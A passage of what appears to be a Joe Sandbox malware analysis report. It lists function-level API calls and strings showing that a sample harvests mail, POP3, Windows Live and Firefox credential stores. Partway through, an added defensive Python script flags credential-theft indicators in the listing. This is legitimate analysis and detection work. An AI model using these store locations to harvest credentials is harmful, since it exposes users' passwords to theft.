                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              APIs
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              • memset.MSVCRT ref: 0040FA1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                              • API String ID: 945165440-3589380929
                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$sprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 3902205911-4097000612
                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscatmemset$_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 632640181-966475738
                                                              • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                              • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
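The function blocks above (the GetPrivateProfileStringA block with the LoginName/PopAccount/PopServer/SavePasswordText keys, the "WindowsLive:name=" block, the "%s@gmail.com" block and the Software\Group Mail / fb.dat block) are the mail-credential harvesting code that the report's "Tries to steal Mail credentials (via file registry)" signature refers to. Reading them by hand across thousands of lines is slow, so here is an added triage script; it is not part of the Joe Sandbox report and not the sample's code. It parses the report's per-function listing format as shown on this page (blocks start at an "APIs" line; "API ID", "String ID", "API String ID" and "Opcode ID" lines follow; "$" is assumed to be the separator inside a String ID value) and flags blocks whose strings reference a credential store, noting which read APIs (GetPrivateProfileStringA and friends) the same function calls. The indicator labels and the READ_APIS set are this example's own choices, and SAMPLE_REPORT is a constructed excerpt of three blocks copied from the listing above.

```python
"""Triage helper for Joe Sandbox per-function listings (added example, not report output)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: three blocks in the page's listing format, trimmed to the
# lines this parser cares about (other lines such as "Memory Dump Source" are ignored).
SAMPLE_REPORT = r"""APIs
  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
• strchr.MSVCRT ref: 0040327B
Strings
Memory Dump Source
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
• Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
APIs
• memset.MSVCRT ref: 00403504
• _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
• _mbscat.MSVCRT ref: 0040356D
Strings
Similarity
• API ID: _mbscatmemset$_mbscpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 632640181-966475738
• Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
APIs
• SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
• LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
Similarity
• API ID: MessageSend$DeleteImageLoadObject$Color
• String ID:
• API String ID: 3642520215-0
• Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
"""

# Substrings seen in this report that point at credential stores. The labels are
# this example's own shorthand (assumption), not anything Joe Sandbox emits.
CREDENTIAL_INDICATORS = {
    "PopAccount": "mail-client INI account record (POP account)",
    "PopServer": "mail-client INI account record (POP server)",
    "LoginName": "mail-client INI account record (login)",
    "SavePasswordText": "mail-client INI account record (stored password)",
    r"Software\Group Mail": "Group Mail registry install path",
    "fb.dat": "Group Mail account file",
    "WindowsLive:name=": "Credential Manager filter for Windows Live entries",
    "user_pref(": "Firefox prefs.js parsing",
    "@gmail.com": "account-name formatting for Gmail",
}
# APIs that actually read the referenced store (assumed set; extend as needed).
READ_APIS = {"GetPrivateProfileStringA", "GetPrivateProfileStringW",
             "RegQueryValueExA", "RegQueryValueExW", "CredEnumerateA", "CredEnumerateW"}

FIELD_RE = re.compile(r"•\s*(API ID|String ID|API String ID|Opcode ID):\s*(.*)$")
# Matches "• name.MODULE(...)" and "• Part of subcall function XXXX: name.MODULE", where the
# name may be a decorated C++ symbol such as ??2@YAPAXI@Z.
API_CALL_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_?@0-9]+)\.([A-Z0-9]+)")


@dataclass
class FunctionBlock:
    api_calls: list = field(default_factory=list)   # (api name, module, reached via subcall)
    api_id: str = ""
    string_ids: list = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""


def parse_blocks(text):
    """Split the listing into FunctionBlock objects, one per 'APIs' header."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "API ID":
                current.api_id = value
            elif key == "String ID":
                current.string_ids = [s for s in value.split("$") if s]
            elif key == "API String ID":
                current.api_string_id = value
            else:
                current.opcode_id = value
            continue
        m = API_CALL_RE.match(line)
        if m:
            current.api_calls.append((m.group(1), m.group(2), "Part of subcall" in line))
    return blocks


def flag_credential_access(blocks):
    """Return one dict per block whose strings hit CREDENTIAL_INDICATORS."""
    hits = []
    for idx, blk in enumerate(blocks):
        matched = {s: label for s in blk.string_ids
                   for needle, label in CREDENTIAL_INDICATORS.items() if needle in s}
        if not matched:
            continue
        readers = sorted({api for api, _, _ in blk.api_calls if api in READ_APIS})
        hits.append({"block": idx, "opcode_id": blk.opcode_id,
                     "strings": matched, "read_apis": readers})
    return hits


if __name__ == "__main__":
    for hit in flag_credential_access(parse_blocks(SAMPLE_REPORT)):
        print(f"block {hit['block']} opcode {hit['opcode_id'][:16]}... reads via {hit['read_apis'] or 'n/a'}")
        for s, label in hit["strings"].items():
            print(f"    {s!r}: {label}")
```

Run it against the full function listing instead of SAMPLE_REPORT to get a short list of the functions worth opening in the disassembly; a block that references the INI keys but shows no read API usually means the actual GetPrivateProfileString call sits in a subcall the listing did not expand.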
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                              • EndDialog.USER32(?,00000002), ref: 00405A96
                                                              • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$DialogMessageSend
                                                              • String ID:
                                                              • API String ID: 2485852401-0
                                                              • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                              • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                              • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                              • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                              • memset.MSVCRT ref: 00405C3B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                              • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                              • Opcode Fuzzy Hash: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                              • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0040BB33
                                                              • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                              • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                              • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                              • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClient
                                                              • String ID:
                                                              • API String ID: 2126104762-0
                                                              • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                              • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                              • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                              • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              APIs
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DAE3
                                                              • memset.MSVCRT ref: 0040DAF7
                                                              • memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_memicmp
                                                              • String ID: user_pref("
                                                              • API String ID: 765841271-2487180061
                                                              • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                              • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                              • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                              • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                              • memset.MSVCRT ref: 004058C3
                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                              • SetFocus.USER32(?), ref: 00405976
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                              APIs
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                              • sprintf.MSVCRT ref: 0040A921
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 1631269929-4153097237
                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,67E97B60,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              APIs
                                                              • memset.MSVCRT ref: 00406B8E
                                                              • strlen.MSVCRT ref: 00406B99
                                                              • strlen.MSVCRT ref: 00406BFF
                                                              • strlen.MSVCRT ref: 00406C0D
                                                              • strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat_mbscpymemset
                                                              • String ID: key3.db$key4.db
                                                              • API String ID: 581844971-3557030128
                                                              • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                              • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
